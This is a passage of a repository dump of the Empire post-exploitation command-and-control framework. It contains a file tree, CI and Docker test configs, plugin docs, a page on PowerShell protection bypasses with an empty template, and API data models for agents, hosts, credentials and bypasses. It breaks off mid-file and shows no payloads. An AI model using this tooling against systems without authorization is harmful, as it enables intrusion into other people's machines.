    │       │   └── test_custom_module_auto_get_source.yaml
    │       └── whoami.x64.o
    │   ├── plugin_install
    │       ├── .gitignore
    │       ├── FooPluginTemplate
    │       │   ├── __init__.py
    │       │   ├── foo.py
    │       │   ├── foo_utils.py
    │       │   └── plugin.yaml
    │       ├── LoadExceptionPlugin
    │       │   ├── __init__.py
    │       │   ├── foo.py
    │       │   └── plugin.yaml
    │       └── marketplace
    │       │   └── .gitignore
    │   ├── test-upload-2.yaml
    │   ├── test-upload.yaml
    │   ├── test_admin_api.py
    │   ├── test_agent_api.py
    │   ├── test_agent_checkins_api.py
    │   ├── test_agent_communication_service.py
    │   ├── test_agent_file_api.py
    │   ├── test_agent_service.py
    │   ├── test_agent_task_api.py
    │   ├── test_agent_task_service.py
    │   ├── test_agents.py
    │   ├── test_bypass_api.py
    │   ├── test_common_agents.py
    │   ├── test_config.py
    │   ├── test_credential_api.py
    │   ├── test_download_api.py
    │   ├── test_download_service.py
    │   ├── test_helpers.py
    │   ├── test_hooks.py
    │   ├── test_hooks_internal.py
    │   ├── test_host_api.py
    │   ├── test_host_process_api.py
    │   ├── test_ip_api.py
    │   ├── test_ip_service.py
    │   ├── test_listener_api.py
    │   ├── test_listener_generate_launcher.py
    │   ├── test_logs.py
    │   ├── test_meta_api.py
    │   ├── test_module_api.py
    │   ├── test_module_service.py
    │   ├── test_modules.py
    │   ├── test_obfuscation_api.py
    │   ├── test_openapi.py
    │   ├── test_option_util.py
    │   ├── test_plugin.py
    │   ├── test_plugin_api.py
    │   ├── test_plugin_registry_api.py
    │   ├── test_plugin_service.py
    │   ├── test_plugin_task_api.py
    │   ├── test_profile_api.py
    │   ├── test_registry_1.yaml
    │   ├── test_registry_2.yaml
    │   ├── test_server_config.yaml
    │   ├── test_socket_hooks.py
    │   ├── test_stager_api.py
    │   ├── test_stager_generation_service.py
    │   ├── test_startup_loaders.py
    │   ├── test_string_util.py
    │   ├── test_tags_api.py
    │   └── test_user_api.py
├── poetry.lock
├── ps-empire
├── pyproject.toml
├── pytest.ini
└── setup
    ├── cert.sh
    ├── checkout-latest-tag.sh
    └── install.sh


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 | github: [bc-security]
3 | 


--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.yaml:
--------------------------------------------------------------------------------
 1 | name: 🚀 Feature Request
 2 | description: File a bug/issue
 3 | title: "[FEATURE REQUEST] <title>"
 4 | labels: ["enhancement"]
 5 | body:
 6 |   - type: textarea
 7 |     attributes:
 8 |       label: Description
 9 |       description: A clear and concise description of what the problem is. Ex. I'm
10 |         always frustrated when [...]
11 |     validations:
12 |       required: true
13 |   - type: textarea
14 |     attributes:
15 |       label: Solution
16 |       description: A clear and concise description of what you want to happen.
17 |     validations:
18 |       required: true
19 |   - type: textarea
20 |     attributes:
21 |       label: Alternatives
22 |       description: A clear and concise description of any alternative solutions or
23 |         features you've considered.
24 |     validations:
25 |       required: false
26 |   - type: textarea
27 |     attributes:
28 |       label: Additional Context
29 |       description: Add any other context or screenshots about the feature request
30 |         here.
31 |     validations:
32 |       required: false
33 | 


--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | version: 2
2 | updates:
3 |   - package-ecosystem: "github-actions"
4 |     directory: "/"
5 |     schedule:
6 |       interval: "weekly"
7 |     target-branch: "private-main"
8 | 


--------------------------------------------------------------------------------
/.github/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | # This is for running the tests in the Docker file, so we can catch
 2 | # issues with the Dockerfile itself.
 3 | version: '3'
 4 | services:
 5 |   test:
 6 |     depends_on:
 7 |       - db
 8 |     links:
 9 |       - 'db:db'
10 |     build: ../
11 |     image: bcsecurity/empire-test
12 |     entrypoint: /bin/bash
13 |     platform: linux/amd64
14 |     command: >
15 |       -c "DATABASE_USE=sqlite poetry run python -m pytest . --nodocker && sed -i
16 |       's/localhost:3306/db:3306/g' empire/test/test_server_config.yaml && DATABASE_USE=mysql
17 |       poetry run python -m pytest . --nodocker"
18 | 
19 |   db:
20 |     image: mysql:8.0
21 |     restart: always
22 |     environment:
23 |       MYSQL_ROOT_PASSWORD: 'root'
24 |       MYSQL_USER: 'empire_user'
25 |       MYSQL_PASSWORD: 'empire_password'
26 |       MYSQL_DATABASE: test_empire
27 |     volumes:
28 |       - db:/var/lib/mysql
29 | volumes:
30 |   db:
31 |     driver: local
32 | 


--------------------------------------------------------------------------------
/.github/install_tests/InstallTest.Dockerfile:
--------------------------------------------------------------------------------
 1 | ARG BASE_IMAGE
 2 | FROM $BASE_IMAGE
 3 | WORKDIR /empire
 4 | COPY . /empire
 5 | 
 6 | SHELL ["/bin/bash", "-c"]
 7 | 
 8 | RUN apt-get update && apt-get -y install sudo
 9 | 
10 | # Add a non-root user
11 | RUN echo 'empire ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
12 | RUN useradd -m empire
13 | RUN chown -R empire:empire /empire
14 | USER empire
15 | 
16 | RUN sed -i 's/use: mysql/use: sqlite/g' empire/server/config.yaml
17 | RUN yes | /empire/setup/install.sh
18 | RUN rm -rf /empire/empire/server/data/empire*
19 | 


--------------------------------------------------------------------------------
/.github/install_tests/cst-config-debian.yaml:
--------------------------------------------------------------------------------
1 | schemaVersion: 2.0.0
2 | containerRunOptions:
3 |   user: "empire"
4 | commandTests:
5 |   - name: "mysql version"
6 |     command: "mysql"
7 |     args: ["--version"]
8 |     expectedOutput: ["mysql  Ver 15.*10.*-MariaDB"]
9 | 


--------------------------------------------------------------------------------
/.github/install_tests/cst-config-kali.yaml:
--------------------------------------------------------------------------------
1 | schemaVersion: 2.0.0
2 | containerRunOptions:
3 |   user: "empire"
4 | commandTests:
5 |   - name: "mysql version"
6 |     command: "mysql"
7 |     args: ["--version"]
8 |     expectedOutput: ["mysql from 11.*-MariaDB*"]
9 | 


--------------------------------------------------------------------------------
/.github/install_tests/cst-config-parrot.yaml:
--------------------------------------------------------------------------------
1 | schemaVersion: 2.0.0
2 | containerRunOptions:
3 |   user: "empire"
4 | commandTests:
5 |   - name: "mysql version"
6 |     command: "mysql"
7 |     args: ["--version"]
8 |     expectedOutput: ["mysql  Ver 15.*10.*-MariaDB"]
9 | 


--------------------------------------------------------------------------------
/.github/install_tests/cst-config-ubuntu.yaml:
--------------------------------------------------------------------------------
1 | schemaVersion: 2.0.0
2 | containerRunOptions:
3 |   user: "empire"
4 | commandTests:
5 |   - name: "mysql version"
6 |     command: "mysql"
7 |     args: ["--version"]
8 |     expectedOutput: ["mysql  Ver 8.0.*"]
9 | 


--------------------------------------------------------------------------------
/.github/pull_request_template.md:
--------------------------------------------------------------------------------
 1 | ## Describe your changes
 2 | 
 3 | ## Issue ticket number and link (if there is one)
 4 | 
 5 | ## Checklist before requesting a review
 6 | - [ ] I have performed a self-review of my code
 7 | - [ ] If it is a core feature, I have added thorough tests.
 8 | - [ ] I have added an entry to `CHANGELOG.md`
 9 | - [ ] I have updated the documentation in `docs/` (if applicable)
10 | 


--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "empire/server/data/profiles"]
2 | 	path = empire/server/data/profiles
3 | 	url = https://github.com/BC-SECURITY/Malleable-C2-Profiles
4 | 


--------------------------------------------------------------------------------
/.go-version:
--------------------------------------------------------------------------------
1 | 1.23.1
2 | 


--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
 1 | repos:
 2 |   - repo: https://github.com/pre-commit/pre-commit-hooks
 3 |     rev: v5.0.0
 4 |     hooks:
 5 |       - id: trailing-whitespace
 6 |       - id: check-json
 7 |       - id: check-yaml
 8 |       - id: check-merge-conflict
 9 |       - id: end-of-file-fixer
10 |   - repo: https://github.com/google/yamlfmt
11 |     rev: v0.16.0
12 |     hooks:
13 |       - id: yamlfmt
14 |   - repo: https://github.com/astral-sh/ruff-pre-commit
15 |     rev: v0.11.2
16 |     hooks:
17 |       - id: ruff
18 |         args: [--fix]
19 |       - id: ruff-format
20 | 


--------------------------------------------------------------------------------
/.python-version:
--------------------------------------------------------------------------------
1 | 3.13
2 | 


--------------------------------------------------------------------------------
/.yamlfmt.yaml:
--------------------------------------------------------------------------------
1 | formatter:
2 |   drop_merge_tag: true
3 |   max_line_length: 79
4 | 


--------------------------------------------------------------------------------
/docs/.gitbook/assets/agents_tab.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/agents_tab.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners/Malleable_C2/malleable_listener.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners/Malleable_C2/malleable_listener.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners/Malleable_C2/malleable_profiles.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners/Malleable_C2/malleable_profiles.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners/http/http_listener_optional.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners/http/http_listener_optional.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners/http/http_listener_required.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners/http/http_listener_required.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners/http/welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners/http/welcome.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/listeners_tab.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/listeners_tab.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/modules.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/modules.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/modules/execute_assembly.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/modules/execute_assembly.gif


--------------------------------------------------------------------------------
/docs/.gitbook/assets/modules/powershell_invoke_script.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/modules/powershell_invoke_script.gif


--------------------------------------------------------------------------------
/docs/.gitbook/assets/modules/python_invoke_script.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/modules/python_invoke_script.gif


--------------------------------------------------------------------------------
/docs/.gitbook/assets/multi_agent_tasking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/multi_agent_tasking.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/plugin-dependencies.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/plugin-dependencies.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/pyvnc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/pyvnc.gif


--------------------------------------------------------------------------------
/docs/.gitbook/assets/server_check_in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/server_check_in.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/stagers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/stagers.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/stagers/multi_generate_agent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/stagers/multi_generate_agent.png


--------------------------------------------------------------------------------
/docs/.gitbook/assets/starkiller_checkin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/.gitbook/assets/starkiller_checkin.png


--------------------------------------------------------------------------------
/docs/listeners/dropbox.md:
--------------------------------------------------------------------------------
1 | # Dropbox Listener
2 | The Dropbox listener has been deprecated due to the use of outdated APIs.
3 | Previous documentation can be found at the [BC Security Dropbox Blog Post](https://www.bc-security.org/post/empire-dropbox-c2-listener/).
4 | 


--------------------------------------------------------------------------------
/docs/listeners/onedrive.md:
--------------------------------------------------------------------------------
1 | # OneDrive Listener
2 | The OneDrive listener has been deprecated due to the use of outdated APIs.
3 | Previous documentation can be found at the [BC Security OneDrive Blog Post](https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/).
4 | 


--------------------------------------------------------------------------------
/docs/plugins/README.md:
--------------------------------------------------------------------------------
 1 | # Plugins
 2 | 
 3 | Plugins are an extension of Empire that allow for custom scripts to be loaded.
 4 | This allows anyone to build or add community projects to extend Empire functionality.
 5 | 
 6 | ## Installing Plugins
 7 | 
 8 | Plugin installation is available through the Starkiller __Plugin Marketplace__.
 9 | 
10 | ### Additional Dependencies
11 | 
12 | If a plugin requires additional Python dependencies, the plugin page will show a warning
13 | that the dependencies need to be installed before the plugin can be loaded.
14 | 
15 | ![](../.gitbook/assets/plugin-dependencies.png)
16 | 


--------------------------------------------------------------------------------
/docs/plugins/development/imports.md:
--------------------------------------------------------------------------------
 1 | # Importing other python files
 2 | 
 3 | Add a `__init__.py` file to your plugin directory to make it a package.
 4 | 
 5 | If you want to import other python files in your plugin, you can do so by importing
 6 | them relative to your entrypoint.
 7 | 
 8 | For example, if you have a file called
 9 | `example_helpers.py` in the same directory as your plugin, you can import it like so:
10 | 
11 | ```python
12 | from . import example_helpers
13 | ```
14 | 


--------------------------------------------------------------------------------
/docs/plugins/development/lifecycle-hooks.md:
--------------------------------------------------------------------------------
 1 | # Lifecycle Hooks
 2 | 
 3 | ## on_load
 4 | 
 5 | The `on_load` function is called when the plugin is loaded into memory.
 6 | ```python
 7 | @override
 8 | def on_load(self, db):
 9 |     print("Plugin loaded")
10 | ```
11 | 
12 | ## on_unload
13 | 
14 | The `on_unload` function is called when the plugin is unloaded from memory.
15 | ```python
16 | @override
17 | def on_unload(self, db):
18 |     print("Plugin unloaded")
19 | ```
20 | 
21 | ## on_start
22 | 
23 | The `on_start` function is called when the plugin is started.
24 | ```python
25 | @override
26 | def on_start(self, db):
27 |     print("Plugin started")
28 | ```
29 | 
30 | ## on_stop
31 | 
32 | The `on_stop` function is called when the plugin is stopped.
33 | ```python
34 | @override
35 | def on_stop(self, db):
36 |     print("Plugin stopped")
37 | ```
38 | 


--------------------------------------------------------------------------------
/docs/plugins/development/notifications.md:
--------------------------------------------------------------------------------
 1 | # Notifications
 2 | 
 3 | Notifications are meant for time sensitive information that the user should be aware of.
 4 | In Starkiller, these get displayed immediately, so it is important not to spam them.
 5 | 
 6 | To send a notification, use the `send_socketio_message` from the `BasePlugin`.
 7 | 
 8 | ```python
 9 | def execute(self, command, **kwargs):
10 |     self.send_socketio_message("Helo World!")
11 | ```
12 | 


--------------------------------------------------------------------------------
/docs/settings/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/settings/README.md


--------------------------------------------------------------------------------
/docs/settings/bypasses.md:
--------------------------------------------------------------------------------
 1 | # Bypasses
 2 | 
 3 | Bypasses are stored in yamls found in `/empire/server/bypass/` and uses a similar formatting as modules. Bypasses are currently only available to PowerShell modules and require a minimum version of PowerShell 3. Earlier version of PowerShell did not contain protections that require bypasses.
 4 | 
 5 | When Empire first loads, it will wrie the data from the yamls to the database. The bypasses can then be edited via Starkiller or the API with the changes going only to the version stored in the database.
 6 | 
 7 | ### Example Bypasses YAML
 8 | 
 9 | ```
10 | name: ''
11 | authors:
12 |   - ''
13 | description: ''
14 | comments:
15 |   - ''
16 | language: powershell
17 | min_language_version: '3'
18 | script: ''
19 | 
20 | 
21 | ```
22 | 


--------------------------------------------------------------------------------
/docs/stagers/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/docs/stagers/README.md


--------------------------------------------------------------------------------
/docs/starkiller/README.md:
--------------------------------------------------------------------------------
 1 | # Starkiller
 2 | Starkiller is a Frontend for [Powershell Empire](https://github.com/BC-SECURITY/Empire/). It is a web application written in VueJS. If you'd like to contribute please follow the [Contribution guide](/CONTRIBUTING.md). If you'd like to request a feature or report a bug, please follow the [Issue template](/.github/ISSUE_TEMPLATE.md).
 3 | 
 4 | # Getting Started
 5 | As of Empire 5.0 and Starkiller 2.0, you no longer need to install Starkiller or build it from source.
 6 | It is prepackaged in Empire as a submodule and served via Empire's API.
 7 | 
 8 | # Sponsorship and extra features
 9 | [Sponsoring](https://github.com/sponsors/BC-SECURITY/) at the `Individual` level will give access to extra features.
10 | 


--------------------------------------------------------------------------------
/docs/starkiller/introduction.md:
--------------------------------------------------------------------------------
1 | # Introduction
2 | 
3 | [DLL\_Cool\_J](https://twitter.com/DLL\_Cool\_J) at ArchCloudLabs has a great Starkiller introduction video to compliment our lack of written documentation.
4 | 
5 | {% embed url="https://youtu.be/zFlsxrGMScE" %}
6 | 


--------------------------------------------------------------------------------
/empire.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python3
 2 | 
 3 | import sys
 4 | 
 5 | from empire import arguments
 6 | from empire.server.core.config import config_manager
 7 | from empire.server.core.config.data_manager import sync_empire_compiler, sync_starkiller
 8 | 
 9 | if __name__ == "__main__":
10 |     args = arguments.args
11 | 
12 |     if args.subparser_name == "server":
13 |         from empire.server import server
14 | 
15 |         server.run(args)
16 |     if args.subparser_name == "setup":
17 |         sync_starkiller(config_manager.empire_config.starkiller)
18 |         sync_empire_compiler(config_manager.empire_config.empire_compiler)
19 | 
20 |     sys.exit(0)
21 | 


--------------------------------------------------------------------------------
/empire/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/__init__.py


--------------------------------------------------------------------------------
/empire/server/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/api_router.py:
--------------------------------------------------------------------------------
 1 | from collections.abc import Callable
 2 | from typing import Any
 3 | 
 4 | from fastapi import APIRouter as FastAPIRouter
 5 | from fastapi.types import DecoratedCallable
 6 | 
 7 | 
 8 | # Allows for with and without trailing slashes
 9 | # https://github.com/tiangolo/fastapi/issues/2060#issuecomment-834868906
10 | class APIRouter(FastAPIRouter):
11 |     def api_route(
12 |         self, path: str, *, include_in_schema: bool = True, **kwargs: Any
13 |     ) -> Callable[[DecoratedCallable], DecoratedCallable]:
14 |         path = path.removesuffix("/")
15 | 
16 |         add_path = super().api_route(
17 |             path, include_in_schema=include_in_schema, **kwargs
18 |         )
19 | 
20 |         alternate_path = path + "/"
21 |         add_alternate_path = super().api_route(
22 |             alternate_path, include_in_schema=False, **kwargs
23 |         )
24 | 
25 |         def decorator(func: DecoratedCallable) -> DecoratedCallable:
26 |             add_alternate_path(func)
27 |             return add_path(func)
28 | 
29 |         return decorator
30 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/admin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/admin/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/agent/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/agent/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/bypass/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/bypass/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/bypass/bypass_dto.py:
--------------------------------------------------------------------------------
 1 | from datetime import datetime
 2 | 
 3 | from pydantic import BaseModel
 4 | 
 5 | from empire.server.api.v2.shared_dto import Author
 6 | 
 7 | 
 8 | def domain_to_dto_bypass(bypass):
 9 |     return Bypass(
10 |         id=bypass.id,
11 |         name=bypass.name,
12 |         authors=bypass.authors or [],
13 |         language=bypass.language,
14 |         code=bypass.code,
15 |         created_at=bypass.created_at,
16 |         updated_at=bypass.updated_at,
17 |     )
18 | 
19 | 
20 | class Bypass(BaseModel):
21 |     id: int
22 |     name: str
23 |     authors: list[Author]
24 |     language: str
25 |     code: str
26 |     created_at: datetime
27 |     updated_at: datetime
28 | 
29 | 
30 | class Bypasses(BaseModel):
31 |     records: list[Bypass]
32 | 
33 | 
34 | class BypassUpdateRequest(BaseModel):
35 |     name: str
36 |     language: str
37 |     code: str
38 | 
39 | 
40 | class BypassPostRequest(BaseModel):
41 |     name: str
42 |     language: str
43 |     code: str
44 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/credential/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/credential/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/download/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/download/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/host/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/host/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/host/host_dto.py:
--------------------------------------------------------------------------------
 1 | from pydantic import BaseModel
 2 | 
 3 | 
 4 | def domain_to_dto_host(host):
 5 |     return Host(
 6 |         id=host.id,
 7 |         name=host.name,
 8 |         internal_ip=host.internal_ip,
 9 |     )
10 | 
11 | 
12 | class Host(BaseModel):
13 |     id: int
14 |     name: str
15 |     internal_ip: str
16 | 
17 | 
18 | class Hosts(BaseModel):
19 |     records: list[Host]
20 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/host/process_dto.py:
--------------------------------------------------------------------------------
 1 | from pydantic import BaseModel
 2 | 
 3 | from empire.server.core.db import models
 4 | 
 5 | 
 6 | def domain_to_dto_process(process: models.HostProcess):
 7 |     agent_id = process.agent.session_id if process.agent else None
 8 | 
 9 |     return Process(
10 |         process_id=process.process_id,
11 |         process_name=process.process_name,
12 |         host_id=process.host_id,
13 |         architecture=process.architecture,
14 |         user=process.user,
15 |         stale=process.stale,
16 |         agent_id=agent_id,
17 |     )
18 | 
19 | 
20 | class Process(BaseModel):
21 |     process_id: int
22 |     process_name: str
23 |     host_id: int
24 |     architecture: str | None = None
25 |     user: str | None = None
26 |     stale: bool
27 |     agent_id: str | None = None
28 | 
29 | 
30 | class Processes(BaseModel):
31 |     records: list[Process]
32 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/ip/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/ip/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/ip/ip_dto.py:
--------------------------------------------------------------------------------
 1 | from datetime import datetime
 2 | from typing import Annotated
 3 | 
 4 | from pydantic import AfterValidator, BaseModel
 5 | 
 6 | from empire.server.core.config.config_manager import valid_ip
 7 | from empire.server.core.db.models import IpList
 8 | 
 9 | 
10 | def domain_to_dto_ip(ip):
11 |     return IP(
12 |         id=ip.id,
13 |         ip_address=ip.ip_address,
14 |         list=ip.list,
15 |         description=ip.description,
16 |         created_at=ip.created_at,
17 |         updated_at=ip.updated_at,
18 |     )
19 | 
20 | 
21 | class IpPostRequest(BaseModel):
22 |     ip_address: Annotated[str, AfterValidator(valid_ip)]
23 |     description: str | None = None
24 |     list: IpList
25 | 
26 | 
27 | class IP(BaseModel):
28 |     id: int
29 |     ip_address: str
30 |     list: IpList
31 |     description: str | None
32 |     created_at: datetime
33 |     updated_at: datetime
34 | 
35 | 
36 | class Ips(BaseModel):
37 |     records: list[IP]
38 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/listener/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/listener/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/meta/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/meta/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/meta/meta_api.py:
--------------------------------------------------------------------------------
 1 | from fastapi import Depends
 2 | 
 3 | import empire.server.common.empire
 4 | from empire.server.api.api_router import APIRouter
 5 | from empire.server.api.jwt_auth import get_current_active_user
 6 | from empire.server.api.v2.meta.meta_dto import EmpireVersion
 7 | from empire.server.api.v2.shared_dto import BadRequestResponse, NotFoundResponse
 8 | 
 9 | router = APIRouter(
10 |     prefix="/api/v2/meta",
11 |     tags=["meta"],
12 |     responses={
13 |         404: {"description": "Not found", "model": NotFoundResponse},
14 |         400: {"description": "Bad request", "model": BadRequestResponse},
15 |     },
16 |     dependencies=[Depends(get_current_active_user)],
17 | )
18 | 
19 | 
20 | @router.get(
21 |     "/version",
22 |     response_model=EmpireVersion,
23 | )
24 | async def read_empire_version():
25 |     return {"version": empire.server.common.empire.VERSION.split(" ")[0]}
26 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/meta/meta_dto.py:
--------------------------------------------------------------------------------
1 | from pydantic import BaseModel
2 | 
3 | 
4 | class EmpireVersion(BaseModel):
5 |     version: str
6 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/module/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/module/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/obfuscation/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/obfuscation/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/plugin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/plugin/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/plugin/plugin_registry_dto.py:
--------------------------------------------------------------------------------
 1 | from pydantic import BaseModel
 2 | 
 3 | from empire.server.api.v2.shared_dto import Author
 4 | 
 5 | 
 6 | class MarketPlaceEntryVersionResponse(BaseModel):
 7 |     name: str
 8 |     git_url: str | None = None
 9 |     tar_url: str | None = None
10 |     ref: str | None = None
11 |     subdirectory: str | None = None
12 | 
13 | 
14 | class MarketplaceEntryRegistryResponse(BaseModel):
15 |     name: str
16 |     registry: str
17 |     homepage_url: str | None = None
18 |     source_url: str | None = None
19 |     authors: list[Author]
20 |     versions: list[MarketPlaceEntryVersionResponse]
21 |     description: str
22 | 
23 | 
24 | class MarketplaceEntryResponse(BaseModel):
25 |     name: str
26 |     registries: dict[str, MarketplaceEntryRegistryResponse]
27 |     installed: bool = False
28 |     installed_version: str | None = None
29 | 
30 | 
31 | class MarketplaceResponse(BaseModel):
32 |     records: list[MarketplaceEntryResponse]
33 | 
34 | 
35 | class PluginInstallRequest(BaseModel):
36 |     name: str
37 |     version: str
38 |     registry: str
39 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/profile/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/profile/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/profile/profile_dto.py:
--------------------------------------------------------------------------------
 1 | from datetime import datetime
 2 | 
